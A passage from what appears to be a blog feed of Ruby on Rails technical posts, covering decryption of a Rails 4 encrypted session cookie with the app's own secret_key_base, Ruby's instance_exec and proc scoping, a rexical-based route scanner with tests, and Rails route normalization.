class="language-ruby">RkxNUWo4NlBKakoyU1VqZWJIKzNaV0lQVVJwQjZhdUVTRnowVHppSVJ3Mk84TStoS1hndFZFNHlNaGw2RHBCc0ZiaEpsM0NtYTg4dnptcjFaQWVJbUdOaFh5MVlCdWVmSHBMNWpKbkRKR0JrSU5KZFYwVjVyWTZ3aUNqSWxJM1RTMkQybEtPUFE5VDFsZVJyakx0dFh3PT0tLTZ5NGIreU00Z0MyNnErS29SSGEyZkE9PQ%3D%3D--3f2fd67e4e7785933485a583720d29ba88bca15f</code></pre><p>Let's open <code>rails console</code> and try to decipher this information.</p><pre><code class="language-ruby">content = 'RkxNUWo4NlBKakoyU1VqZWJIKzNaV0lQVVJwQjZhdUVTRnowVHppSVJ3Mk84TStoS1hndFZFNHlNaGw2RHBCc0ZiaEpsM0NtYTg4dnptcjFaQWVJbUdOaFh5MVlCdWVmSHBMNWpKbkRKR0JrSU5KZFYwVjVyWTZ3aUNqSWxJM1RTMkQybEtPUFE5VDFsZVJyakx0dFh3PT0tLTZ5NGIreU00Z0MyNnErS29SSGEyZkE9PQ%3D%3D--3f2fd67e4e7785933485a583720d29ba88bca15f'</code></pre><p>When the content is written to cookie then it is escaped. So first we need to<code>unescape</code> it.</p><pre><code class="language-ruby">unescaped_content = URI.unescape(content)=&gt; &quot;RkxNUWo4NlBKakoyU1VqZWJIKzNaV0lQVVJwQjZhdUVTRnowVHppSVJ3Mk84TStoS1hndFZFNHlNaGw2RHBCc0ZiaEpsM0NtYTg4dnptcjFaQWVJbUdOaFh5MVlCdWVmSHBMNWpKbkRKR0JrSU5KZFYwVjVyWTZ3aUNqSWxJM1RTMkQybEtPUFE5VDFsZVJyakx0dFh3PT 0tLTZ5NGIreU00Z0MyNnErS29SSGEyZkE9PQ==--3f2fd67e4e7785933485a583720d29ba88bca15f&quot;</code></pre><p>Now we need <code>secret_key_base</code> value. And using that let's build <code>key_generator</code>.</p><pre><code class="language-ruby">secret_key_base = 'b14e9b5b720f84fe02307ed16bc1a32ce6f089e10f7948422ccf3349d8ab586869c11958c70f46ab4cfd51f0d41043b7b249a74df7d53c7375d50f187750a0f5'key_generator = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)key_generator = ActiveSupport::CachingKeyGenerator.new(key_generator)</code></pre><p>Our <code>MessageEncryptior</code> needs two long random strings for encryption. So let'sgenerate two keys for encryptor.</p><pre><code class="language-ruby">secret = key_generator.generate_key('encrypted cookie')sign_secret = key_generator.generate_key('signed encrypted cookie')encryptor = ActiveSupport::MessageEncryptor.new(secret, sign_secret)</code></pre><p>Now we can finally decipher the data.</p><pre><code class="language-ruby">data =  encryptor.decrypt_and_verify(unescaped_content)puts data=&gt; neerajsingh0101</code></pre><p>As you can see we need the <code>secret_key_base</code> to make sense out of cookie data.So in Rails 4 the session data will be encrypted ,by default.</p><h2>How to migrate from Rails 3.x to Rails 4 without loosing cookie</h2><p>Rails4 will transparently will upgrade cookies from unencrypted to encryptedcookies. This is a brilliant example of trivial choices removed by Rails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding instance exec in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-instance-exec-in-ruby"/>
      <updated>2013-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-instance-exec-in-ruby</id>
      <content type="html"><![CDATA[<p>In ruby procs have lexical scoping. What does that even mean. Let's start with asimple example.</p><pre><code class="language-ruby">square = lambda { x * x }x = 20puts square.call()# =&gt; undefined local variable or method `x' for main:Object (NameError)</code></pre><p>So even though variable <code>x</code> is present, the proc could not find it because whenthe code was read then <code>x</code> was missing .</p><p>Let's fix the code.</p><pre><code class="language-ruby">x = 2square = lambda { x * x }x = 20puts square.call()# =&gt; 400</code></pre><p>In the above case we got the answer. But the answer is <code>400</code> instead of <code>4</code> .That is because the proc binding refers to the variable <code>x</code>. The binding doesnot hold the value of the variable, it just holds the list of variablesavailable. In this case the value of <code>x</code> happens to be <code>20</code> when the code wasexecuted and the result is <code>400</code> .</p><p><code>x</code> does not have to a variable. It could be a method. Check this out.</p><pre><code class="language-ruby">square = lambda { x * x }def x  20endputs square.call()# =&gt; 400</code></pre><p>In the above case <code>x</code> is a method definition. Notice that binding is smartenough to figure out that since no <code>x</code> variable is present let's try and see ifthere is a method by name <code>x</code> .</p><h2>Another example of lexical binding in procs</h2><pre><code class="language-ruby">def square(p)   x = 2   puts p.callendx = 20square(lambda { x * x })#=&gt; 400</code></pre><p>In the above case the value of <code>x</code> is set as <code>20</code> at the code compile time.Don't get fooled by <code>x</code> being <code>2</code> inside the method call. Inside the method calla new scope starts and the <code>x</code> inside the method is not the same <code>x</code> as outside.</p><h2>Issues because of lexical scoping</h2><p>Here is a simple case.</p><pre><code class="language-ruby">class Person  code = proc { puts self }  define_method :name do    code.call()  endendclass Developer &lt; PersonendPerson.new.name # =&gt; PersonDeveloper.new.name # =&gt; Person</code></pre><p>In the above case when <code>Developer.new.name</code> is executed then output is <code>Person</code>.And that can cause problem. For example in Ruby on Rails at a number of places<code>self</code> is used to determine if the model that is being acted upon is <code>STI</code> ornot. If the model is <code>STI</code> then for <code>Developer</code> the query will have an extrawhere clause like <code>AND &quot;people&quot;.&quot;type&quot; IN ('Developer')</code> . So we need to find asolution so that <code>self</code> reports correctly for both <code>Person</code> and 'Developer` .</p><h2>instance_eval can change self</h2><p><a href="http://www.ruby-doc.org/core-2.0/BasicObject.html#method-i-instance_eval">instance_eval</a>can be used to change self. Here is refactored code using <code>instance_eval</code> .</p><pre><code class="language-ruby">class Person  code = proc { puts self }  define_method :name do    self.class.instance_eval &amp;code  endendclass Developer &lt; PersonendPerson.new.name #=&gt; PersonDeveloper.new.name #=&gt; Developer</code></pre><p>Above code produces right result. However <code>instance_eval</code> has one limitation. Itdoes not accept arguments. Let's change the proc to accept some arguments totest this theory out.</p><pre><code class="language-ruby">class Person  code = proc { |greetings| puts greetings; puts self }  define_method :name do    self.class.instance_eval 'Good morning', &amp;code  endendclass Developer &lt; PersonendPerson.new.nameDeveloper.new.name#=&gt; wrong number of arguments (1 for 0) (ArgumentError)</code></pre><p>In the above case we get an error. That's because <code>instance_eval</code> does notaccept arguments.</p><p>This is where <code>instance_exec</code> comes to rescue. It allows us to change <code>self</code> andit can also accept arguments.</p><h2>instance_exec to rescue</h2><p>Here is code refactored to use <code>instance_exec</code> .</p><pre><code class="language-ruby">class Person  code = proc { |greetings| puts greetings; puts self }  define_method :name do    self.class.instance_exec 'Good morning', &amp;code  endendclass Developer &lt; PersonendPerson.new.name #=&gt; Good morning PersonDeveloper.new.name #=&gt; Good morning Developer</code></pre><p>As you can see in the above code <code>instance_exec</code> reports correct <code>self</code> and theproc can also accept arguments .</p><h2>Conclusion</h2><p>I hope this article helps you understand why <code>instance_exec</code> is useful.</p><p>I scanned <a href="https://github.com/rails/rails">RubyOnRails source code</a> and foundaround 26 usages of <code>instance_exec</code> . Look at the usage of <code>instance_exec</code> usagethere to gain more understanding on this topic.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rex, Rexical and Rails routing]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rex-rexical-and-rails-routing"/>
      <updated>2013-02-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rex-rexical-and-rails-routing</id>
      <content type="html"><![CDATA[<p><em>Please read <a href="journey-into-rails-routing">Journey into Rails routing</a> to get abackground on Rails routing discussion.</em></p><h2>A new language</h2><p>Let's say that the route definition looks like this.</p><pre><code class="language-plaintext">/page/:id(/:action)(.:format)</code></pre><p>The task at hand is to develop a new programming language which will understandthe rules of the route definitions. Since this language deals with <code>routes</code>let's call this language <code>Poutes</code> . Well <code>Pout</code> sounds better so let's roll withthat.</p><h2>It all begins with scanner</h2><p><a href="https://github.com/tenderlove/rexical">rexical</a> is a gem which generatesscanner generator. Notice that <code>rexical</code> is not a scanner itself. It willgenerate a scanner for the given rules. Let's give it a try.</p><p>Create a folder called <code>pout_language</code> and in that folder create a file called<code>pout_scanner.rex</code> . Notice that the extension of the file is <code>.rex</code> .</p><pre><code class="language-ruby">class PoutScannerend</code></pre><p>Before we proceed any further, let's compile to make sure it works.</p><pre><code class="language-plaintext">$ gem install rexical$ rex pout_scanner.rex -o pout_scanner.rb$ lspout_scanner.rb pout_scanner.rex</code></pre><p>While doing gem install do not do <code>gem install rex</code> . We are installing gemcalled <code>rexical</code> not <code>rex</code> .</p><h2>Time to add rules</h2><p>Now it's time to add rules to our <code>pout.rex</code> file.</p><p>Let's try to develop scanner which can detect difference between integers andstrings .</p><pre><code class="language-plaintext">class PoutScannerrule  \d+         { puts &quot;Detected number&quot; }  [a-zA-Z]+   { puts &quot;Detected string&quot; }end</code></pre><p>Regenerate the scanner .</p><pre><code class="language-plaintext">$ rex pout_scanner.rex -o pout_scanner.rb</code></pre><p>Now let's put the scanner to test . Let's create <code>pout.rb</code> .</p><pre><code class="language-ruby">require './pout_scanner.rb'class Pout  @scanner = PoutScanner.new  @scanner.tokenize(&quot;123&quot;)end</code></pre><p>You will get the error <code>undefined method</code>tokenize' for#<a href="PoutScanner:0x007f9630837980">PoutScanner:0x007f9630837980</a> (NoMethodError)` .</p><p>To fix this error open <code>pout_scanner.rex</code> and add inner section like this .</p><pre><code class="language-ruby">class PoutScannerrule  \d+         { puts &quot;Detected number&quot; }  [a-zA-Z]+   { puts &quot;Detected string&quot; }inner  def tokenize(code)    scan_setup(code)    tokens = []    while token = next_token      tokens &lt;&lt; token    end    tokens  endend</code></pre><p>Regenerate the scanner by executing <code>rex pout_scanner.rex -o pout_scanner.rb</code> .Now let's try to run <code>pout.rb</code> file.</p><pre><code class="language-ruby">$ ruby pout.rbDetected number</code></pre><p>So this time we got some result.</p><p>Now let's test for a string .</p><pre><code class="language-ruby"> require './pout_scanner.rb'class Pout  @scanner = PoutScanner.new  @scanner.tokenize(&quot;hello&quot;)end$ ruby pout.rbDetected string</code></pre><p>So the scanner is rightly identifying string vs integer. We are going to add alot more testing so let's create a test file so that we do not have to keepchanging the <code>pout.rb</code> file.</p><h2>Tests and Rake file</h2><p>This is our <code>pout_test.rb</code> file.</p><pre><code class="language-ruby">require 'test/unit'require './pout_scanner'class PoutTest  &lt; Test::Unit::TestCase  def setup    @scanner = PoutScanner.new  end  def test_standalone_string    assert_equal [[:STRING, 'hello']], @scanner.tokenize(&quot;hello&quot;)  endend</code></pre><p>And this is our <code>Rakefile</code> file .</p><pre><code class="language-ruby">require 'rake'require 'rake/testtask'task :generate_scanner do  `rex pout_scanner.rex -o pout_scanner.rb`endtask :default =&gt; [:generate_scanner, :test_units]desc &quot;Run basic tests&quot;Rake::TestTask.new(&quot;test_units&quot;) { |t|  t.pattern = '*_test.rb'  t.verbose = true  t.warning = true}</code></pre><p>Also let's change the <code>pout_scanner.rex</code> file to return an array instead of<code>puts</code> statements . The array contains information about what type of element itis and the value .</p><pre><code class="language-ruby">class PoutScannerrule  \d+         { [:INTEGER, text.to_i] }  [a-zA-Z]+   { [:STRING, text] }inner  def tokenize(code)    scan_setup(code)    tokens = []    while token = next_token      tokens &lt;&lt; token    end    tokens  endend</code></pre><p>With all this setup now all we need to do is write test and run <code>rake</code> .</p><h2>Tests for integer</h2><p>I added following test and it passed.</p><pre><code class="language-ruby">def test_standalone_integer  assert_equal [[:INTEGER, 123]], @scanner.tokenize(&quot;123&quot;)end</code></pre><p>However following test failed .</p><pre><code class="language-ruby">def test_string_and_integer  assert_equal [[:STRING, 'hello'], [:INTEGER, 123]], @scanner.tokenize(&quot;hello 123&quot;)end</code></pre><p>Test is failing with following message</p><pre><code class="language-plaintext">  1) Error:test_string_and_integer(PoutTest):PoutScanner::ScanError: can not match: ' 123'</code></pre><p>Notice that in the error message before 123 there is a space. So the scannerdoes not know how to handle space. Let's fix that.</p><p>Here is the updated rule. We do not want any action to be taken when a space isdetected. Now test is passing .</p><pre><code class="language-ruby">class PoutScannerrule  \s+  \d+         { [:INTEGER, text.to_i] }  [a-zA-Z]+   { [:STRING, text] }inner  def tokenize(code)    scan_setup(code)    tokens = []    while token = next_token      tokens &lt;&lt; token    end    tokens  endend</code></pre><h2>Back to routing business</h2><p>Now that we have some background on how scanning works let's get back tobusiness at hand. The task is to properly parse a routing statement like<code>/page/:id(/:action)(.:format)</code> .</p><h2>Test for slash</h2><p>The simplest route is one with <code>/</code> . Let's write a test and then rule for it.</p><pre><code class="language-ruby">require 'test/unit'require './pout_scanner'class PoutTest  &lt; Test::Unit::TestCase  def setup    @scanner = PoutScanner.new  end  def test_just_slash    assert_equal [[:SLASH, '/']], @scanner.tokenize(&quot;/&quot;)  endend</code></pre><p>And here is the <code>.rex</code> file .</p><pre><code class="language-ruby">class PoutScannerrule  \/         { [:SLASH, text] }inner  def tokenize(code)    scan_setup(code)    tokens = []    while token = next_token      tokens &lt;&lt; token    end    tokens  endend</code></pre><h2>Test for /page</h2><p>Here is the test for <code>/page</code> .</p><pre><code class="language-ruby">def test_slash_and_literal  assert_equal [[:SLASH, '/'], [:LITERAL, 'page']] , @scanner.tokenize(&quot;/page&quot;)end</code></pre><p>And here is the rule that was added .</p><pre><code class="language-ruby"> [a-zA-Z]+  { [:LITERAL, text] }</code></pre><h3>Test for /:page</h3><p>Here is test for <code>/:page</code> .</p><pre><code class="language-ruby">def test_slash_and_symbol  assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']] , @scanner.tokenize(&quot;/:page&quot;)end</code></pre><p>And here are the rules .</p><pre><code class="language-ruby">rule  \/          { [:SLASH, text]   }  \:[a-zA-Z]+ { [:SYMBOL, text]  }  [a-zA-Z]+   { [:LITERAL, text] }</code></pre><h2>Test for /(:page)</h2><p>Here is test for <code>/(:page)</code> .</p><pre><code class="language-ruby">def test_symbol_with_paran  assert_equal  [[[:SLASH, '/'], [:LPAREN, '('],  [:SYMBOL, ':page'], [:RPAREN, ')']]] , @scanner.tokenize(&quot;/(:page)&quot;)end</code></pre><p>And here is the new rule</p><pre><code class="language-ruby">  \/\(\:[a-z]+\) { [ [:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }</code></pre><p>We'll stop here and will look at the final set of files</p><h2>Final files</h2><p>This is <code>Rakefile</code> .</p><pre><code class="language-ruby">require 'rake'require 'rake/testtask'task :generate_scanner do  `rex pout_scanner.rex -o pout_scanner.rb`endtask :default =&gt; [:generate_scanner, :test_units]desc &quot;Run basic tests&quot;Rake::TestTask.new(&quot;test_units&quot;) { |t|  t.pattern = '*_test.rb'  t.verbose = true  t.warning = true}</code></pre><p>This is <code>pout_scanner.rex</code> .</p><pre><code class="language-ruby">class PoutScannerrule  \/\(\:[a-z]+\) { [ [:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }  \/          { [:SLASH, text]   }  \:[a-zA-Z]+ { [:SYMBOL, text]  }  [a-zA-Z]+   { [:LITERAL, text] }inner  def tokenize(code)    scan_setup(code)    tokens = []    while token = next_token      tokens &lt;&lt; token    end    tokens  endend</code></pre><p>This is <code>pout_test.rb</code> .</p><pre><code class="language-ruby">require 'test/unit'require './pout_scanner'class PoutTest  &lt; Test::Unit::TestCase  def setup    @scanner = PoutScanner.new  end  def test_just_slash    assert_equal [[:SLASH, '/']] , @scanner.tokenize(&quot;/&quot;)  end  def test_slash_and_literal    assert_equal [[:SLASH, '/'], [:LITERAL, 'page']] , @scanner.tokenize(&quot;/page&quot;)  end  def test_slash_and_symbol    assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']] , @scanner.tokenize(&quot;/:page&quot;)  end  def test_symbol_with_paran    assert_equal  [[[:SLASH, '/'], [:LPAREN, '('],  [:SYMBOL, ':page'], [:RPAREN, ')']]] , @scanner.tokenize(&quot;/(:page)&quot;)  endend</code></pre><h2>How scanner works</h2><p>Here we used <code>rex</code> to generate the scanner. Now take a look that the<code>pout_scanner.rb</code> . Here is <a href="https://gist.github.com/4672018">that file</a> .Please take a look at this file and study the code. It is only 91 lines of code.</p><p>If you look at the code it is clear that scanning is not that hard. You can handroll it without using a tool like <code>rex</code> . And that's exactly what AaronPatternson did in <a href="http://github.com/rails/journey">Journey</a> . He hand rolledthe<a href="https://github.com/rails/journey/blob/master/lib/journey/scanner.rb">scanner</a> .</p><h2>Conclusion</h2><p>In this blog we saw how to use <code>rex</code> to build the scanner to read our routingstatements . In the next blog we'll see how to parse the routing statement andhow to find the matching routing statement for a given url .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails Routing -- a comprehensive look at routing]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/journey-into-rails-routing"/>
      <updated>2013-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/journey-into-rails-routing</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with edge rails (rails4) .</em></p><p>When a Rails application boots then it reads the <code>config/routes.rb</code> file. Inyour routes you might have code like this</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  root 'users#index'  resources :users  get 'photos/:id' =&gt; 'photos#show', :defaults =&gt; { :format =&gt; 'jpg' }  get '/logout' =&gt; 'sessions#destroy', :as =&gt; :logout  get &quot;/stories&quot; =&gt; redirect(&quot;/photos&quot;)end</code></pre><p>In the above case there are five different routing statements. Rails needs tostore all those routes in a manner such that later when url is '/photos/5' thenit should be able to find the right route statement that should handle therequest.</p><p>In this article we are going to take a peek at how Rails handles the wholerouting business.</p><h2>Normalization in action</h2><p>In order to compare various routing statements first all the routing statementsneed to be normalized to a standard format so that one can easily compare oneroute statement with another route statement.</p><p>Before we take a deep dive into how the normalization works lets first see somenormalizations in action.</p><h2>get call with defaults</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  get 'photos/:id' =&gt; 'photos#show', :defaults =&gt; { :format =&gt; 'jpg' }end</code></pre><p>After the normalization process the above routing statement is transformed intofive different variables. The values for all those five variables is shownbelow.</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007fd05e0cf7e8           @defaults={:format=&gt;&quot;jpg&quot;, :controller=&gt;&quot;photos&quot;, :action=&gt;&quot;show&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007fd05e0cf7c0           @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/photos/:id(.:format)&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {:format=&gt;&quot;jpg&quot;, :controller=&gt;&quot;photos&quot;, :action=&gt;&quot;show&quot;}as: nilanchor: true</code></pre><p><code>app</code> is the application that will be executed if conditions are met.<code>conditions</code> are the conditions. Pay attention to <code>:path_info</code> in conditions.This is used by Rails to determine the right route statement. <code>defaults</code> aredefaults and <code>requirements</code> are the constraints.</p><h2>GET call with as</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  get '/logout' =&gt; 'sessions#destroy', :as =&gt; :logoutend</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8ded87e740           @defaults={:controller=&gt;&quot;sessions&quot;, :action=&gt;&quot;destroy&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007f8ded87e718 @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/logout(.:format)&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {:controller=&gt;&quot;sessions&quot;, :action=&gt;&quot;destroy&quot;}as: &quot;logout&quot;anchor: true</code></pre><p>Notice that in the above case <code>as</code> is populate with <code>logout</code> .</p><h2>root call</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  root 'users#index'end</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007fe91507f278           @defaults={:controller=&gt;&quot;users&quot;, :action=&gt;&quot;index&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007fe91507f250 @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {:controller=&gt;&quot;users&quot;, :action=&gt;&quot;index&quot;}as: &quot;root&quot;anchor: true</code></pre><p>Notice that in the above case <code>as</code> is populated. And the <code>path_info</code> is <code>/</code>since this is the root url .</p><h2>GET call with constraints</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  #get 'pictures/:id' =&gt; 'pictures#show', :constraints =&gt; { :id =&gt; /[A-Z]\d{5}/ }end</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8158e052c8           @defaults={:controller=&gt;&quot;pictures&quot;, :action=&gt;&quot;show&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007f8158e05278 @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/pictures/:id(.:format)&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {:id=&gt;/[A-Z]\d{5}/}defaults: {:controller=&gt;&quot;pictures&quot;, :action=&gt;&quot;show&quot;}as: nilanchor: true</code></pre><p>Notice that in the above case <code>requirements</code> is populated with constraintsmentioned in the route definition .</p><h2>get with a redirect</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  get &quot;/stories&quot; =&gt; redirect(&quot;/posts&quot;)end</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: redirect(301, /posts)conditions: {:path_info=&gt;&quot;/stories(.:format)&quot;, :required_defaults=&gt;[], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {}as: &quot;stories&quot;anchor: true</code></pre><p>Notice that in the above case <code>app</code> is a simple redirect .</p><h2>Resources</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  resources :usersend</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a315c0           @defaults={:action=&gt;&quot;index&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41a31598 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;index&quot;, :controller=&gt;&quot;users&quot;}as: &quot;users&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a4ef80           @defaults={:action=&gt;&quot;create&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41a4ef58 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;POST&quot;]}defaults: {:action=&gt;&quot;create&quot;, :controller=&gt;&quot;users&quot;}as: nilapp: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b63790           @defaults={:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41b63768 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/new(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}as: &quot;new_user&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a10550           @defaults={:action=&gt;&quot;edit&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41a10528 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id/edit(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;edit&quot;, :controller=&gt;&quot;users&quot;}as: &quot;edit_user&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41f31818           @defaults={:action=&gt;&quot;show&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41f317f0 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;show&quot;, :controller=&gt;&quot;users&quot;}as: &quot;user&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d44a9bb70           @defaults={:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d44a9bb48 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;PATCH&quot;]}defaults: {:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}as: nilapp: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b17480           @defaults={:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41b17458 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;PUT&quot;]}defaults: {:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}as: nilapp: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d439ddf68           @defaults={:action=&gt;&quot;destroy&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d439ddf40 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;DELETE&quot;]}defaults: {:action=&gt;&quot;destroy&quot;, :controller=&gt;&quot;users&quot;}as: nil</code></pre><p>In this case I omitted <code>requirements</code> and <code>anchor</code> for brevity .</p><p>Notice that a single routing statement <code>resources :users</code> created eightnormalized routing statements. It means that <code>resources</code> statement is basicallya short cut for defining all those eight routing statements .</p><h2>Resources with only</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  resources :users, only: :newend</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007fdf55043e40           @defaults={:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007fdf55043e18 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/new(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}as: &quot;new_user&quot;</code></pre><p>Because of <code>only</code> keyword only one routing statement was produced in this case.</p><h2>Mapper</h2><p>In Rails <code>ActionDispatch::Routing::Mapper</code> class is responsible for normalizingall routing statements.</p><pre><code class="language-ruby">module ActionDispatch  module Routing    class Mapper      include Base      include HttpHelpers      include Redirection      include Scoping      include Concerns      include Resources    end  endend</code></pre><p>Now let's look at what these included modules do</p><h2>Base</h2><pre><code class="language-ruby">module Base  def root (options = {})  end  def match  end  def mount(app, options = {})  end</code></pre><p>As you can see <code>Base</code> handles <code>root</code>, <code>match</code> and <code>mount</code> calls.</p><h2>HttpHelpers</h2><pre><code class="language-ruby">module HttpHelpers  def get(*args, &amp;block)  end  def post(*args, &amp;block)  end  def patch(*args, &amp;block)  end  def put(*args, &amp;block)  end  def delete(*args, &amp;block)  endend</code></pre><p><code>HttpHelpers</code> handles <code>get</code>, <code>post</code>, <code>patch</code>, <code>put</code> and <code>delete</code> .</p><h2>Scoping</h2><pre><code class="language-ruby">module Scoping  def scope(*args)  end  def namespace(path, options = {})  end  def constraints(constraints = {})  endend</code></pre><h2>Resources</h2><pre><code class="language-ruby">module Resources  def resource(*resources, &amp;block)  end  def resources(*resources, &amp;block)  end  def collection  end  def member  end  def shallow  endend</code></pre><h2>Let's put all the routes together</h2><p>So now let's look at all the routes definition together.</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  root 'users#index'  get 'photos/:id' =&gt; 'photos#show', :defaults =&gt; { :format =&gt; 'jpg' }  get '/logout' =&gt; 'sessions#destroy', :as =&gt; :logout  get 'pictures/:id' =&gt; 'pictures#show', :constraints =&gt; { :id =&gt; /[A-Z]\d{5}/ }  get &quot;/stories&quot; =&gt; redirect(&quot;/posts&quot;)  resources :usersend</code></pre><p>Above routes definition produces following information. I am going to show infopath info.</p><pre><code class="language-plaintext">{ :path_info=&gt;&quot;/&quot;:path_info=&gt;&quot;/photos/:id(.:format)&quot; }{ :path_info=&gt;&quot;/logout(.:format)&quot; }{ :path_info=&gt;&quot;/pictures/:id(.:format) 